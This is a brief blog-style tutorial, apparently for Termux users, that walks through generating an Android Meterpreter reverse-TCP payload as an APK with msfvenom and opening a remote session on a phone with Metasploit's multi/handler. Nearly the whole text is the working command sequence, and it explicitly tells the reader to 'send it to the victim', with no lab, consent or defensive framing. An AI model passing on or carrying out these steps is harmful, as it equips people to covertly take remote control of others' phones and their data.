Friday

Generation and execution of Payload on target device in MetaSploit Framework via Termux

MetaSploit Framework basic Payload Tutorial


first you need to install metasploit.
we made a little tool for that, or you can just type:
- pkg install unstable repo && pkg install metasploit


🔴How to actually generate it🔴

Once in Termux, type:

msfvenom -p android/meterpreter/reverse_tcp LPORT=4444 LHOST=your IP R >/sdcard/name.apk

after some seconds it will be appear a little message that show the payload's size.

check in the file manager on the internal storage.

you'll see the payload, just send it to the victim or install the payload in a phone.

then, open termux and type:


-msfconsole

-use multi/handler

-set payload android/meterpreter/reverse_tcp

-set lport 4444

-set lhost your IP

-exploit

The job is done boys, when the meterpreter session is opened just type help to see what you can do.

No comments: